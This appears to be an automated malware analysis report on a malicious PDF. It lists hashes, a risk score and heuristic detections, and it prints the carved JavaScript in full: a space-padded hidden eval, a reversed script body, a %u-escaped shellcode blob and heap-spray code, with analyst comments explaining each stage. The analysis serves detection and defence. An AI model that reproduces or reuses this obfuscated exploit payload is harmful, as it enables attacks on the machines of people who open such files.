Malicious PDF — malware analysis report

Static analysis result for SHA-256 539cc0152e0467d4…

MALICIOUS

PDF

69.2 KB First seen: 2026-05-10
MD5: 35ac96bac259532ce273b72bf57fae36 SHA-1: 21c436634f40e93977ba5d63a9c489854ebebe29 SHA-256: 539cc0152e0467d4cf502fba58c0a42c17effc2169f777e95fa6ba4717171ffc
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3718 bytes
SHA-256: bc02c88bef4d6f96b8ab533fb7536e2be7456c1c8d496c69cebffc4a79c9c871
Detection
ClamAV: No threats found (no signature matched; this is not a clean verdict — see the obfuscation finding below)
Obfuscation or payload: likely
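Carved artifact contains 1 eval/decoder/string-building token(s). Treat this count as a lower bound: in the preview below, the eval keyword is assembled from a space-padded string and the script body is stored reversed, so plain token matching sees only part of it.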
Preview script
First 1,000 lines of the extracted script
// Analyst notes added to the preview; the script text itself is unchanged.
// Stage 1 - hidden eval: the Function body is "eval(a);" padded with spaces that
// split(" ").join("") strips at run time, so the keyword never appears contiguously
// in the stream. Calling eva(x) evaluates x as code.
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
// Stage 2 - reversed body: s holds the real script written back to front, which keeps
// names such as unescape, substring and Array out of plain string matches.
// Read right to left, it aliases unescape, strips the padding spaces from the long run
// of %u-escaped 16-bit values and decodes it, builds a filler string from %u0c0c
// (assembled one character at a time) by repeated doubling, and stores 0x1f0 large
// copies of filler plus decoded blob in an array. That structure is the heap-spray
// pattern and is consistent with the "Obfuscation or payload: likely" verdict.
// Triage hint: normalise before matching (strip whitespace, test the reversed string).
// NOTE(review): the literal is shown wrapped over two lines here; presumably a preview
// artifact - confirm against the carved file.
       var s=' ;"s"+RfAtj=]o[dTIMw )++o;0f1x0<o;0=o( rof ;)(yarrA wen = dTIMw rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.Upz = RfAtj ;Upz =+ Upz )00008x0 < htgnel.Upz(elihw ;)2/63556 ,0(gnirtsbus.E = Upz ;y =+ E ;N =+ E ;)2/)42x0-c0c0x0( ,0(gnirtsbus.y = E ;y=+y )63556 < 8 + 02 + htgnel.y( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (Yj = y rav ;) )""(nioj.)" "(tilps."5a14  u % 2ec8  u % 9524  u % 145e  u % 077a  u % 1d56  u % 3102  u % 0df2  u % ce37  u % 8b9b  u % ff9f  u % 3fdf  u % 57cf  u % 40dd  u % c7c7  u % 9fe5  u % 68e3  u % 49c5  u % 3db7  u % bf0f  u % e49c  u % 30ab  u % b9c6  u % 3752  u % 013e  u % a141  u % f034  u % 81a0  u % 07af  u % 5c68  u % a2c6  u % 09ff  u % 02e7  u % c295  u % e369  u % 9742  u % 76a2  u % 9940  u % 3a16  u % 9de1  u % c60e  u % 05f9  u % 6d4d  u % d4a4  u % 880b  u % 0ec3  u % bfab  u % 3295  u % e1b3  u % 7a9f  u % bfb9  u % b7c6  u % 830e  u % 6cb6  u % 2c39  u % 51c1  u % 2831  u % 89cd  u % bba9  u % 45f0  u % 23ba  u % c7d3  u % 0482  u % 7f5c  u % b716  u % 2159  u % b505  u % 819c  u % 018a  u % 7adb  u % 9087  u % 3d70  u % c66a  u % a6f7  u % ab9a  u % 65e7  u % d8be  u % 3e94  u % 4dc9  u % 80b1  u % 0906  u % 5f9d  u % 9afa  u % 1a9f  u % 5dda  u % 2675  u % 9c1e  u % 1515  u % eeec  u % 0dbd  u % 629b  u % 3459  u % 3690  u % eadd  u % 0eb5  u % bf9c  u % 37e0  u % acbd  u % afbe  u % 908b  u % 1f31  u % ddda  u % 30fc  u % 6c40  u % e038  u % 1365  u % 4fe5  u % 4742  u % 6d9d  u % 40bd  u % 7df4  u % ab99  u % 1b33  u % 339c  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % 
d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % " (Yj = N rav ;epacsenu = Yj rav ';
// Stage 3 - s is reversed back into readable source and handed to the hidden eval.
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
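Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A). This is a heuristic indicator on an embedded font stream; confirm by inspecting the flagged region before treating it as shellcode.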